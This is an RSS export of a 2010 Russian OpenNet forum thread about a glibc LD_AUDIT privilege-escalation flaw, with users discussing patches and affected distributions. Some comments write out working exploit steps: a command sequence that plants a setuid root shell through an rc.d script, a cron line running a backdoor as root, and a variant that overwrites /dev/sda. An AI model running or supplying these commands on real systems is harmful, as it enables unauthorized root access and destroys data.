<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: Для Glibc представлен еще один метод повышения привилегий</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/71714.html</link>
    <description>Спустя несколько дней после обнаружения в системной библиотеке GNU C Library (glibc) уязвимости (http://www.opennet.ru/opennews/art.shtml?num=28338), сообщается (http://seclists.org/fulldisclosure/2010/Oct/344) о нахождении еще одного метода взлома, позволяющего выполнить код с привилегиями суперпользователя. В отличие от ранее представленной техники, новый метод эксплуатации проявляется не только в RHEL, Fedora и CentOS, но и в Debian/Ubuntu и других Linux-дистрибутивах, использующих glibc 2.4 или более позднюю версию. Отдельно собщается (http://www.openwall.com/lists/announce/2010/10/22/1), что проблеме не подвержена glibc из состава OpenWall (http://www.openwall.com/) и ALT Linux, так как в данных дистрибутивах изначально по умолчанию использован повышающий безопасность патч &quot;sanitize-env&quot;.&lt;br&gt;&lt;br&gt;&lt;br&gt;По своей сути новая уязвимость основана на том же принципе и базируется на отсутствии должных проверок при динамическом связывании в режиме LD_AUDIT библиотек с исполняемыми файлами, для кото...&lt;br&gt;&lt;br&gt;URL: http://seclist</description>

<item>
    <title>Для Glibc представлен еще один метод повышения привилегий (nik)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/71714.html#106</link>
    <pubDate>Wed, 27 Oct 2010 10:59:25 GMT</pubDate>
    <description>в генте в нестабильном профиле приехал glibc-2.12.1-r2 сегодня&lt;br&gt;дыра закрыта&lt;br&gt;</description>
</item>

<item>
    <title>Для Glibc представлен еще один метод повышения привилегий (Kostik)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/71714.html#105</link>
    <pubDate>Tue, 26 Oct 2010 18:49:39 GMT</pubDate>
    <description>&amp;gt; интересно, а куда еще можно&lt;br&gt;&amp;gt; чего засунуть, чтобы получить рута?&lt;br&gt;&lt;br&gt;apache+mpm_itk&lt;br&gt;</description>
</item>

<item>
    <title>Для Glibc представлен еще один метод повышения привилегий (Pentarh)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/71714.html#103</link>
    <pubDate>Mon, 25 Oct 2010 16:47:35 GMT</pubDate>
    <description>Создали файл в /etc/cron.d&lt;br&gt;&lt;br&gt;Потом благодаря аттрибутам 666, записали такое в него&lt;br&gt;&lt;br&gt;* * * * * root /tmp/mybackdoor.bin &amp;gt; /dev/null&lt;br&gt;&lt;br&gt;И через минуту бекдор от рута висит в памяти.&lt;br&gt;&lt;br&gt;достаточно хилый?&lt;br&gt;</description>
</item>

<item>
    <title>Для Glibc представлен еще один метод повышения привилегий (аноним)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/71714.html#102</link>
    <pubDate>Mon, 25 Oct 2010 16:16:12 GMT</pubDate>
    <description>если не получается с помощью cron то есть другие методы, например ниже изложен метод получения прав root для Arch Linux. А вообще суть этой уязвимости в том, что можно создать файлы с правами на запись в них для обычного пользователя, в тех каталогах в которых это делать запрещено. &lt;br&gt; &lt;br&gt;на Arch Linux я получил консоль с правами root(запустив после рестарта системы из консоли обычного пользователя команду /usr/bin/sdash) использовав эти указания из аналогичной темы на LOR:&lt;br&gt;&lt;br&gt;especially for ArchLinux users:&lt;br&gt;&lt;br&gt;umask 0&lt;br&gt;LD_AUDIT=&quot;libpcprofile.so&quot; PCPROFILE_OUTPUT=&quot;/etc/rc.d/functions.d/exploit&quot; ping&lt;br&gt;echo -e &apos;#!/bin/bash&#092;ncp /bin/dash /usr/bin/sdash&#092;nchmod u+s /usr/bin/sdash&apos; &amp;gt; /etc/rc.d/functions.d/exploit&lt;br&gt;sudo reboot&lt;br&gt;&lt;br&gt;/usr/bin/sdash -c &apos;whoami&apos;&lt;br&gt;/usr/bin/sdash -c &apos;rm -f /usr/bin/sdash /etc/rc.d/functions.d/exploit&apos;&lt;br&gt;</description>
</item>

<item>
    <title>Для Glibc представлен еще один метод повышения привилегий (анончик)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/71714.html#101</link>
    <pubDate>Mon, 25 Oct 2010 09:12:57 GMT</pubDate>
    <description>тут ошибка не конкретная, а системная. и этот и предыдущий баг нужно фиксить во избежание. игры с огнем никому не нужны&lt;br&gt;</description>
</item>

<item>
    <title>Для Glibc представлен еще один метод повышения привилегий (AX)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/71714.html#100</link>
    <pubDate>Mon, 25 Oct 2010 05:47:31 GMT</pubDate>
    <description>&amp;gt;не стоит пакета glibc-utils-&amp;gt; нет libpcprofile.so -&amp;gt; не работает уязвимость -&amp;gt; happy happy&lt;br&gt;&lt;br&gt;Во-первых, не во всех дистрах glibc и glibc-utils разделены.&lt;br&gt;Во-вторых, libpcprofile.so &amp;#8212; не единственная библиотека, которую можно использовать.&lt;br&gt;</description>
</item>

<item>
    <title>Для Glibc представлен еще один метод повышения привилегий (i)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/71714.html#99</link>
    <pubDate>Mon, 25 Oct 2010 05:12:16 GMT</pubDate>
    <description>sys-libs/glibc-2.11.2 не работает &lt;br&gt;Oct 25 09:18:01 cron&#091;3032&#093;: (*system*) BAD FILE MODE (/etc/cron.d/exploit)&lt;br&gt;ну и что, что файл создался толку то...&lt;br&gt;</description>
</item>

<item>
    <title>Для Glibc представлен еще один метод повышения привилегий (утер)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/71714.html#98</link>
    <pubDate>Mon, 25 Oct 2010 04:34:17 GMT</pubDate>
    <description>для особо одаренных пожалуй надо повторить:&lt;br&gt;не стоит пакета glibc-utils-&amp;gt; нет libpcprofile.so -&amp;gt; не работает уязвимость -&amp;gt; happy happy&lt;br&gt;</description>
</item>

<item>
    <title>Для Glibc представлен еще один метод повышения привилегий (xdsl)</title>
    <link>https://www.opennet.dev/openforum/vsluhforumID3/71714.html#97</link>
    <pubDate>Mon, 25 Oct 2010 04:31:27 GMT</pubDate>
    <description>Тут на лоре такой вариант предложили для особо упорствующих: &lt;br&gt;umask 0 ; LD_AUDIT=&quot;libpcprofile.so&quot; PCPROFILE_OUTPUT=&quot;/dev/sda&quot; ping&lt;br&gt;</description>
</item>

</channel>
</rss>
